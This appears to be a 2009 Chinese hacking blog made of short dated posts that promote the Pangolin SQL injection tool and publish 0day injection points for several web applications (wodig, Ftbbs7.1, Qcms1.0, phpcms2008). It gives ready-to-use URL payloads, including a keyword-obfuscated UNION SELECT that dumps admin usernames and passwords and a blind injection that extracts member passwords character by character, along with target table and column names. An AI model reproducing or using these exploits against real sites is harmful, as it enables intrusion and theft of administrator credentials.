27 五 09 Pangolin v2.3.0.948注入工具下载
pangolin2.3.0.948注入工具下载
这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html
22 五 09 wodig注入漏洞
wodig注入漏洞
wodig漏洞文件Default.asp?tags_name=a’
article.asp?Src_Child=1&Src_ChildSub=a’
wodig.asp?tags_name=a’这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络
07 四 09 Ftbbs7.1静态GBK版注入0day(coolkid提供)
ftbbs7.1注入漏洞
Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin
请使用ftbbs的用户关注它的官网安全补丁发布.
26 三 09 Qcms1.0漏洞
qcms 0day
qcms 0day漏洞如下:
1.可以下载数据库。
2.注入:
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下:
admin_name=trim(request.Form(“admin_name”))
(全文…)
16 三 09 phpcms2008-0day ask/search_ajax.php注入漏洞
安全
作者:nuke
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
测试方法:
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23
